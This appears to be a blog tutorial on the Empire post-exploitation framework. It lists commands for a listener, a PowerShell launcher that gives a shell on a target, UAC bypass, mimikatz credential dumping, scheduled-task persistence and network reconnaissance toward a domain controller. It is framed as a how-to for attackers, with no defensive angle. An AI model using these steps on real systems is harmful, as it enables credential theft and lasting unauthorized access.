Post Exploitation: Empire

You may be able to learn how to exploit a system from a few articles but if you don’t know what you’re going to do after you’ve hacked, there’s no special meaning in hacking it at all. In this article, I’ll talk about an excellent exploitation framework called Empire.

Empire is a great post exploitation tool that contains python and powershell modules. Let’s get to the examples without further ado.


apt install powershell-empire

Let’s start by creating a listener.

With the uselistener command the http connection point opens. You can check the connection settings with the info command.

Connection point is created with the execute command.

Let’s get to the real point. A powershell code is created with the launcher powershell command. When we run this code in the target system we’ll get the shell.

We can see the machines we’re connected to with agents command. As you can see, we got a session when we ran the code in the target system. We can list the machines with list command. We can connect to the machine with interact command. And if you’ve noticed, there’s an asterisk in front of the username. This means we have admin authorities in the target machine.

Empire tool

After connecting to the target machine with interact command, we check the machine’s data with info command and then we can see that high_integrity is 1 which means that we’re an admin.

What would we have to do if we weren’t an admin?

Empire tool

We can jump on the admin authorities with bypassuac [listener name] command.

Empire tool

Let’s get the user passwords with mimikatz command.

Empire tool

We can see it more organized with creds command.

Empire tool

We can persist in the target machine using Empire.

usemodule persistance/elevated/schtasks
Empire tool

We can also scan the network our target machine is using.

usemodule situational_awareness/network/arpscan
Empire tool

As you can see there’s a machine in the network. We can also find the Domain Controller if we’d like.

usemodule situational_awareness/network/powerview/find_localadmin_access
Empire tool

Good Luck!

Leave a Reply

Your email address will not be published. Required fields are marked *